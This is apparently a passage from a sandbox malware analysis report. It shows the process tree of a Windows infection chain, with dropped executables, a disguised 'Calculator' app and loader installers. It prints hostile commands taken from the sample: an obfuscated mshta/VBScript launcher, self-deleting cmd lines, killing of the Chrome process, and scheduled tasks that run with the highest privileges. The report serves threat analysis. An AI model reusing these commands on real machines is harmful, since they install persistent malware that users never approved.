        "C:\Users\Admin\Pictures\Adobe Films\KOU3bQITrVQ9_cBcqyutPh3v.exe"
        6⤵
        
        PID:5244
        
        C:\Users\Admin\Documents\6Xunaqr8pTeSfpbOfxHy0_Vk.exe
        
        "C:\Users\Admin\Documents\6Xunaqr8pTeSfpbOfxHy0_Vk.exe"
        7⤵
        
        PID:5304
        
        C:\Users\Admin\Pictures\Adobe Films\JhzRlKJ4lPbqdLqhox4gSMQe.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\JhzRlKJ4lPbqdLqhox4gSMQe.exe"
        8⤵
        
        PID:6872
        
        C:\Users\Admin\Pictures\Adobe Films\JHTIe_7oGZpayT5pHCQtf0tj.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\JHTIe_7oGZpayT5pHCQtf0tj.exe"
        8⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "JHTIe_7oGZpayT5pHCQtf0tj.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\JHTIe_7oGZpayT5pHCQtf0tj.exe" & exit
        9⤵
        
        PID:6668
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "JHTIe_7oGZpayT5pHCQtf0tj.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:7312
        
        C:\Users\Admin\Pictures\Adobe Films\bpUBPsVkkkAxetXzMbkXIEQ7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\bpUBPsVkkkAxetXzMbkXIEQ7.exe"
        8⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\bpUBPsVkkkAxetXzMbkXIEQ7.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\bpUBPsVkkkAxetXzMbkXIEQ7.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        9⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\bpUBPsVkkkAxetXzMbkXIEQ7.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\bpUBPsVkkkAxetXzMbkXIEQ7.exe" ) do taskkill -f -iM "%~NxM"
        10⤵
        
        PID:8112
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "bpUBPsVkkkAxetXzMbkXIEQ7.exe"
        11⤵
        Kills process with taskkill
        
        PID:7720
        
        C:\Users\Admin\Pictures\Adobe Films\0T6qc8pT01iCuQ4YHGCNt44M.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0T6qc8pT01iCuQ4YHGCNt44M.exe"
        8⤵
        
        PID:5856
        
        C:\Users\Admin\Pictures\Adobe Films\0T6qc8pT01iCuQ4YHGCNt44M.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0T6qc8pT01iCuQ4YHGCNt44M.exe" -u
        9⤵
        
        PID:6020
        
        C:\Users\Admin\Pictures\Adobe Films\QKc7ZXOoxHopwMuvdJG2Nqv8.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\QKc7ZXOoxHopwMuvdJG2Nqv8.exe"
        8⤵
        
        PID:5804
        
        C:\Users\Admin\Pictures\Adobe Films\3jwtVv9K1Auo0MjjVx0IBXyO.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3jwtVv9K1Auo0MjjVx0IBXyO.exe"
        8⤵
        
        PID:6696
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        9⤵
        
        PID:7388
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
        10⤵
        
        PID:8656
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffb0764dec0,0x7ffb0764ded0,0x7ffb0764dee0
        11⤵
        
        PID:7608
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7dca19e70,0x7ff7dca19e80,0x7ff7dca19e90
        12⤵
        
        PID:12140
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --mojo-platform-channel-handle=1784 /prefetch:8
        11⤵
        
        PID:13228
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2672 /prefetch:1
        11⤵
        
        PID:13260
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2632 /prefetch:1
        11⤵
        
        PID:13252
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --mojo-platform-channel-handle=2328 /prefetch:8
        11⤵
        
        PID:13244
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1736 /prefetch:2
        11⤵
        
        PID:13220
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --mojo-platform-channel-handle=2896 /prefetch:8
        11⤵
        
        PID:13056
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --mojo-platform-channel-handle=3652 /prefetch:8
        11⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --mojo-platform-channel-handle=3080 /prefetch:8
        11⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --mojo-platform-channel-handle=3116 /prefetch:8
        11⤵
        
        PID:13100
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=392 /prefetch:2
        11⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1720,8547580298930326782,10409780041578212857,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8656_18883901" --mojo-platform-channel-handle=3292 /prefetch:8
        11⤵
        
        PID:6664
        
        C:\Users\Admin\Pictures\Adobe Films\F6XwvyIuBRraIzHzmmiNYJVj.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\F6XwvyIuBRraIzHzmmiNYJVj.exe"
        8⤵
        
        PID:6932
        
        C:\Users\Admin\Pictures\Adobe Films\EEpHDnW0PNr8PPalA_S1sXw2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EEpHDnW0PNr8PPalA_S1sXw2.exe"
        8⤵
        
        PID:4204
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:7516
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:7812
        
        C:\Users\Admin\Pictures\Adobe Films\kekkuhSOQlPASBMlC06NSYiX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\kekkuhSOQlPASBMlC06NSYiX.exe"
        8⤵
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\is-FTA2P.tmp\kekkuhSOQlPASBMlC06NSYiX.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FTA2P.tmp\kekkuhSOQlPASBMlC06NSYiX.tmp" /SL5="$20686,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kekkuhSOQlPASBMlC06NSYiX.exe"
        9⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\is-5VR0C.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5VR0C.tmp\DYbALA.exe" /S /UID=2709
        10⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\3b-d23d3-75e-a3997-66efdb926cf35\SHedasikiqae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3b-d23d3-75e-a3997-66efdb926cf35\SHedasikiqae.exe"
        11⤵
        
        PID:6044
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sj33tcrg.unv\GcleanerEU.exe /eufive & exit
        12⤵
        
        PID:11348
        
        C:\Users\Admin\AppData\Local\Temp\sj33tcrg.unv\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\sj33tcrg.unv\GcleanerEU.exe /eufive
        13⤵
        
        PID:4176
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sf2wsumb.dtn\installer.exe /qn CAMPAIGN="654" & exit
        12⤵
        
        PID:12120
        
        C:\Users\Admin\AppData\Local\Temp\sf2wsumb.dtn\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\sf2wsumb.dtn\installer.exe /qn CAMPAIGN="654"
        13⤵
        
        PID:12332
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\thkwnbpl.1ut\any.exe & exit
        12⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\thkwnbpl.1ut\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\thkwnbpl.1ut\any.exe
        13⤵
        
        PID:12632
        
        C:\Users\Admin\AppData\Local\Temp\thkwnbpl.1ut\any.exe
        
        "C:\Users\Admin\AppData\Local\Temp\thkwnbpl.1ut\any.exe" -u
        14⤵
        
        PID:12040
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pxfld3an.1zh\gcleaner.exe /mixfive & exit
        12⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\pxfld3an.1zh\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\pxfld3an.1zh\gcleaner.exe /mixfive
        13⤵
        
        PID:12816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jmbj1sp2.cui\autosubplayer.exe /S & exit
        12⤵
        
        PID:12444
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:6348
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:6328
      - C:\Users\Admin\Pictures\Adobe Films\Bmj0KsjdUn8aICoW6HHPndvG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Bmj0KsjdUn8aICoW6HHPndvG.exe"
        6⤵
        
        PID:3188
      - C:\Users\Admin\Pictures\Adobe Films\qPkgupgFXS4hY3Q5K9ov3k9W.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\qPkgupgFXS4hY3Q5K9ov3k9W.exe"
        6⤵
        
        PID:5052
      - C:\Users\Admin\Pictures\Adobe Films\FrvwcNCzsIc9oRRKUCFJl1G2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\FrvwcNCzsIc9oRRKUCFJl1G2.exe"
        6⤵
        
        PID:1672
      - C:\Users\Admin\Pictures\Adobe Films\aR6ZZpZe1TuFgCUPBmMBeIuh.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aR6ZZpZe1TuFgCUPBmMBeIuh.exe"
        6⤵
        
        PID:4172
        
        C:\Users\Admin\Pictures\Adobe Films\aR6ZZpZe1TuFgCUPBmMBeIuh.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aR6ZZpZe1TuFgCUPBmMBeIuh.exe"
        7⤵
        
        PID:1176
      - C:\Users\Admin\Pictures\Adobe Films\kRHwNDwOSnLwnMPBV3LaHJbq.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\kRHwNDwOSnLwnMPBV3LaHJbq.exe"
        6⤵
        
        PID:6040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue2076b72c2666aa9c.exe
      4⤵
      PID:1084
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue2076b72c2666aa9c.exe
        
        Tue2076b72c2666aa9c.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        
        PID:1220
      - C:\Users\Admin\Pictures\Adobe Films\CiEW7P2Vu3VTKRjBabzGFRHM.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\CiEW7P2Vu3VTKRjBabzGFRHM.exe"
        6⤵
        
        PID:4636
      - C:\Users\Admin\Pictures\Adobe Films\BwWTrYq3hnhPrAmP4ClOqj6z.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\BwWTrYq3hnhPrAmP4ClOqj6z.exe"
        6⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 1444
        7⤵
        Program crash
        
        PID:2568
      - C:\Users\Admin\Pictures\Adobe Films\sS_9UP2ajHhAtIp3_YUkIy2W.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\sS_9UP2ajHhAtIp3_YUkIy2W.exe"
        6⤵
        
        PID:4440
        
        C:\Users\Admin\Documents\VQiymPuovi80gfUolk8vCEV4.exe
        
        "C:\Users\Admin\Documents\VQiymPuovi80gfUolk8vCEV4.exe"
        7⤵
        
        PID:3108
        
        C:\Users\Admin\Pictures\Adobe Films\NUCrVnHAJckFlykEQs80eFUz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\NUCrVnHAJckFlykEQs80eFUz.exe"
        8⤵
        
        PID:5072
        
        C:\Users\Admin\Pictures\Adobe Films\S1izry5xQOtZ8Jb6wrt3HIR_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\S1izry5xQOtZ8Jb6wrt3HIR_.exe"
        8⤵
        
        PID:3788
        
        C:\Users\Admin\Pictures\Adobe Films\LqzzZfggUc44u20vFWGivL7_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\LqzzZfggUc44u20vFWGivL7_.exe"
        8⤵
        
        PID:7076
        
        C:\Users\Admin\Pictures\Adobe Films\2uFu0hN_apYMhvtdpXE7ZzMa.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\2uFu0hN_apYMhvtdpXE7ZzMa.exe"
        8⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\2uFu0hN_apYMhvtdpXE7ZzMa.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\2uFu0hN_apYMhvtdpXE7ZzMa.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        9⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\2uFu0hN_apYMhvtdpXE7ZzMa.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\2uFu0hN_apYMhvtdpXE7ZzMa.exe" ) do taskkill -f -iM "%~NxM"
        10⤵
        
        PID:6152
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "2uFu0hN_apYMhvtdpXE7ZzMa.exe"
        11⤵
        Kills process with taskkill
        
        PID:7288
        
        C:\Users\Admin\Pictures\Adobe Films\UjB7DpNVHa5nBJBeJNC7lbgP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UjB7DpNVHa5nBJBeJNC7lbgP.exe"
        8⤵
        
        PID:6952
        
        C:\Users\Admin\Pictures\Adobe Films\6l6rnP2r1BSL16lHlpM0WxuS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6l6rnP2r1BSL16lHlpM0WxuS.exe"
        8⤵
        
        PID:7104
        
        C:\Users\Admin\Pictures\Adobe Films\lWe0uuxjfkJJnyL7adWBXsJ2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lWe0uuxjfkJJnyL7adWBXsJ2.exe"
        8⤵
        
        PID:4160
        
        C:\Users\Admin\Pictures\Adobe Films\lWe0uuxjfkJJnyL7adWBXsJ2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lWe0uuxjfkJJnyL7adWBXsJ2.exe" -u
        9⤵
        
        PID:5672
        
        C:\Users\Admin\Pictures\Adobe Films\G4S2_dZ_ezv5k7DcpKwATeQu.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\G4S2_dZ_ezv5k7DcpKwATeQu.exe"
        8⤵
        
        PID:872
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        9⤵
        
        PID:1524
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
        10⤵
        
        PID:7176
        
        C:\Users\Admin\Pictures\Adobe Films\TlzXOnIr1DpRDIJE9Egtl1xk.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\TlzXOnIr1DpRDIJE9Egtl1xk.exe"
        8⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\is-M0D9F.tmp\TlzXOnIr1DpRDIJE9Egtl1xk.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M0D9F.tmp\TlzXOnIr1DpRDIJE9Egtl1xk.tmp" /SL5="$30386,506127,422400,C:\Users\Admin\Pictures\Adobe Films\TlzXOnIr1DpRDIJE9Egtl1xk.exe"
        9⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\is-R96AT.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-R96AT.tmp\DYbALA.exe" /S /UID=2709
        10⤵
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\f0-9f0d1-aaa-6de97-f54970ec145fd\Temapiloshae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f0-9f0d1-aaa-6de97-f54970ec145fd\Temapiloshae.exe"
        11⤵
        
        PID:6816
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2224
        12⤵
        
        PID:9696
        
        C:\Users\Admin\AppData\Local\Temp\0f-3ebf2-5f2-318b6-ebcfbaf5688a8\Jycasonanu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0f-3ebf2-5f2-318b6-ebcfbaf5688a8\Jycasonanu.exe"
        11⤵
        
        PID:7080
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dw1wkpik.exc\GcleanerEU.exe /eufive & exit
        12⤵
        
        PID:11820
        
        C:\Users\Admin\AppData\Local\Temp\dw1wkpik.exc\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\dw1wkpik.exc\GcleanerEU.exe /eufive
        13⤵
        
        PID:11984
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rljmxluw.eka\installer.exe /qn CAMPAIGN="654" & exit
        12⤵
        
        PID:12188
        
        C:\Users\Admin\AppData\Local\Temp\rljmxluw.eka\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\rljmxluw.eka\installer.exe /qn CAMPAIGN="654"
        13⤵
        
        PID:12496
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\way1opsn.znz\any.exe & exit
        12⤵
        
        PID:11440
        
        C:\Users\Admin\AppData\Local\Temp\way1opsn.znz\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\way1opsn.znz\any.exe
        13⤵
        
        PID:12752
        
        C:\Users\Admin\AppData\Local\Temp\way1opsn.znz\any.exe
        
        "C:\Users\Admin\AppData\Local\Temp\way1opsn.znz\any.exe" -u
        14⤵
        
        PID:5556
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1vzci0lj.tmb\gcleaner.exe /mixfive & exit
        12⤵
        
        PID:12364
        
        C:\Users\Admin\AppData\Local\Temp\1vzci0lj.tmb\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\1vzci0lj.tmb\gcleaner.exe /mixfive
        13⤵
        
        PID:12904
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ukf2jmjk.tgq\autosubplayer.exe /S & exit
        12⤵
        
        PID:12684
        
        C:\Program Files\Windows Portable Devices\XENKLXXBTU\foldershare.exe
        
        "C:\Program Files\Windows Portable Devices\XENKLXXBTU\foldershare.exe" /VERYSILENT
        11⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5080
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4820
      - C:\Users\Admin\Pictures\Adobe Films\OGItXxtYIBqGo7QcbmKm4TEA.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\OGItXxtYIBqGo7QcbmKm4TEA.exe"
        6⤵
        
        PID:4300
        
        C:\Program Files (x86)\Company\NewProduct\cutm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        7⤵
        
        PID:5452
      - C:\Users\Admin\Pictures\Adobe Films\tmfiNkDqaI7NL6CF_r5RIK1H.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\tmfiNkDqaI7NL6CF_r5RIK1H.exe"
        6⤵
        
        PID:4456
      - C:\Users\Admin\Pictures\Adobe Films\YBZoQB4zvLffkfphbDquZcxj.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\YBZoQB4zvLffkfphbDquZcxj.exe"
        6⤵
        
        PID:4464
      - C:\Users\Admin\Pictures\Adobe Films\Fh1FtEXRx3twQiwDDtpQMvtC.exe
        
